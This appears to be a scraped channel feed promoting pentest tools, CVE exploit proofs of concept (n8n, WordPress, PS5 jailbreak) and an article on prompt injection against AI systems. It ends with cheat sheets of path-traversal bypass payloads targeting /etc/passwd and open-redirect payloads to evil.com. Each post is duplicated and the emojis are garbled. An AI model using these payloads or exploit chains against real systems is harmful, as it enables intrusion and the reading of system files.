Legion โ Automated Network Pentesting ๐ก๏ธ
Legion is a GUI based network penetration testing framework built to automate reconnaissance, scanning, service enumeration, and vulnerability discovery
๐ธ Nmap, Nikto, WhatWeb, Hydra, SMBenum
๐น CVE & vulnerability mapping
๐ธ Automated scanning & enumeration
Github ๐
๐ก @RootAccessClub
Legion is a GUI based network penetration testing framework built to automate reconnaissance, scanning, service enumeration, and vulnerability discovery
๐ธ Nmap, Nikto, WhatWeb, Hydra, SMBenum
๐น CVE & vulnerability mapping
๐ธ Automated scanning & enumeration
Github ๐
๐ก @RootAccessClub
โคโ๐ฅ2
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain ๐ฅ
Unauthenticated Arbitrary File Read โ Admin Token Forge โ Sandbox Bypass โ RCE ๐ช
CVSS : 10.0 + 9.9 (Critical) โ ๏ธ
Fixed : 1.121.0 (AFR) / 1.120.4+ (RCE) โ
Github ๐
๐ช @RootAccessClub
Unauthenticated Arbitrary File Read โ Admin Token Forge โ Sandbox Bypass โ RCE ๐ช
CVSS : 10.0 + 9.9 (Critical) โ ๏ธ
Fixed : 1.121.0 (AFR) / 1.120.4+ (RCE) โ
Github ๐
๐ช @RootAccessClub
โคโ๐ฅ1
Osintgram ๐ฅ
An open source OSINT framework for Instagram reconnaissance and information gathering ๐
Key Features:
โข Profile & content analysis
โข Followers / Following analysis
โข Hashtag & location searches
โข Media and metadata analysis
โข Account comparison
โข Interactive Web UI
โข AI assisted mode with local Ollama support
โข JSON & HTML report generation
GitHub ๐
โ ๏ธ Use responsibly and only with data you are authorized to investigate
๐ @RootAccessClub
An open source OSINT framework for Instagram reconnaissance and information gathering ๐
Key Features:
โข Profile & content analysis
โข Followers / Following analysis
โข Hashtag & location searches
โข Media and metadata analysis
โข Account comparison
โข Interactive Web UI
โข AI assisted mode with local Ollama support
โข JSON & HTML report generation
GitHub ๐
โ ๏ธ Use responsibly and only with data you are authorized to investigate
๐ @RootAccessClub
โคโ๐ฅ4
WordPress Critical RCE ๐จ
CVE-2026-87902 | CVSS 9.2 ๐ซฏ
A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ
Affected versions span 4.7 โ 7.1.1 ๐ฆ
๐ก๏ธ Fix: Update to the latest patched WordPress release for your branch
GitHub ๐
@RootAccessClub
CVE-2026-87902 | CVSS 9.2 ๐ซฏ
A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ
Affected versions span 4.7 โ 7.1.1 ๐ฆ
๐ก๏ธ Fix: Update to the latest patched WordPress release for your branch
GitHub ๐
@RootAccessClub
๐ฅ2
Root Access Club
WordPress Critical RCE ๐จ CVE-2026-87902 | CVSS 9.2 ๐ซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ Affected versions spanโฆ
CVE-2026-87902 ๐งช
WordPress unauthenticated LFI โ conditional RCE ๐
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
WordPress unauthenticated LFI โ conditional RCE ๐
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
๐ฅ2
Root Access Club
WordPress Critical RCE ๐จ CVE-2026-87902 | CVSS 9.2 ๐ซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ Affected versions spanโฆ
CVE-2026-87902 ๐ชค
PoC for CVE-2026-87902 โ unauthenticated path traversal in WordPress page-template resolution (local PHP inclusion, conditional RCE) with a pinned vulnerable lab
GitHub ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
PoC for CVE-2026-87902 โ unauthenticated path traversal in WordPress page-template resolution (local PHP inclusion, conditional RCE) with a pinned vulnerable lab
GitHub ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
๐ฅ2
Root Access Club
WordPress Critical RCE ๐จ CVE-2026-87902 | CVSS 9.2 ๐ซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ Affected versions spanโฆ
CVE-2026-87902 โ Nuclei Template ๐งฉ
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
โก๏ธ@RootAccessClub
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
โก๏ธ@RootAccessClub
๐ฅ2
Prompt Injection in the Wild ๐
A look at real world In Page Prompt Injection attacks, where malicious instructions are hidden inside web content and processed by AI systems
Link ๐
@RootAccessClub
A look at real world In Page Prompt Injection attacks, where malicious instructions are hidden inside web content and processed by AI systems
Link ๐
@RootAccessClub
๐ฅ3
AutoPWN Suite โก๏ธ
An automated penetration testing framework designed to streamline reconnaissance, vulnerability discovery, and security testing โจ
โข Nmap-based network & service enumeration
โข CVE & vulnerability discovery
โข Automated exploit searching
โข Web vulnerability testing
โข Directory enumeration
โข Web UI + REST API
โข Scan scheduling & automation
โข Email / Webhook notifications
โข Optional evasion techniques
GitHub ๐
๐ช @RootAccessClub
An automated penetration testing framework designed to streamline reconnaissance, vulnerability discovery, and security testing โจ
โข Nmap-based network & service enumeration
โข CVE & vulnerability discovery
โข Automated exploit searching
โข Web vulnerability testing
โข Directory enumeration
โข Web UI + REST API
โข Scan scheduling & automation
โข Email / Webhook notifications
โข Optional evasion techniques
GitHub ๐
๐ช @RootAccessClub
โคโ๐ฅ3
Relapse โ PS5 Jailbreak Exploit ๐ฎ
A new exploit chain called Relapse has been released, targeting PS5 firmware versions 7.00 through 13.60 ๐ฏ
๐น WebKit Exploit
๐น Kernel Exploit
๐น Execution of unofficial payloads
๐น Support for payloads such as kstuff and etaHEN
When successfully executed, Relapse can enable a Jailbreak environment and allow execution of unofficial code and payloads on the PS5 ๐ฅ
โ ๏ธ Check your console's firmware version before attempting anything
GitHub ๐
๐ช @RootAccessCLUB
A new exploit chain called Relapse has been released, targeting PS5 firmware versions 7.00 through 13.60 ๐ฏ
๐น WebKit Exploit
๐น Kernel Exploit
๐น Execution of unofficial payloads
๐น Support for payloads such as kstuff and etaHEN
When successfully executed, Relapse can enable a Jailbreak environment and allow execution of unofficial code and payloads on the PS5 ๐ฅ
โ ๏ธ Check your console's firmware version before attempting anything
GitHub ๐
๐ช @RootAccessCLUB
โก2
Path Traversal Bypasses โก๏ธ
Null Byte Injection
../../../etc/./passwd%00.png
Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd
Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd
Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././
โญ๏ธ @RootAccessClub
Null Byte Injection
../../../etc/./passwd%00.png
Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd
Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd
Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././
โญ๏ธ @RootAccessClub
Open redirects filter bypass payloads ๐ฅ
---->\/evil.com
---->\/\/evil.com
---->\\evil.com
----//evil.com
---->//theirsite@evil.com
---->////evil.com
----//google%E3%80%82com
---->//%2F/evil.com
---->////evil.com
---->/%2F/yoururl.com
๐ช @RootAccessClub
---->\/evil.com
---->\/\/evil.com
---->\\evil.com
----//evil.com
---->//theirsite@evil.com
---->////evil.com
----//google%E3%80%82com
---->//%2F/evil.com
---->////evil.com
---->/%2F/yoururl.com
๐ช @RootAccessClub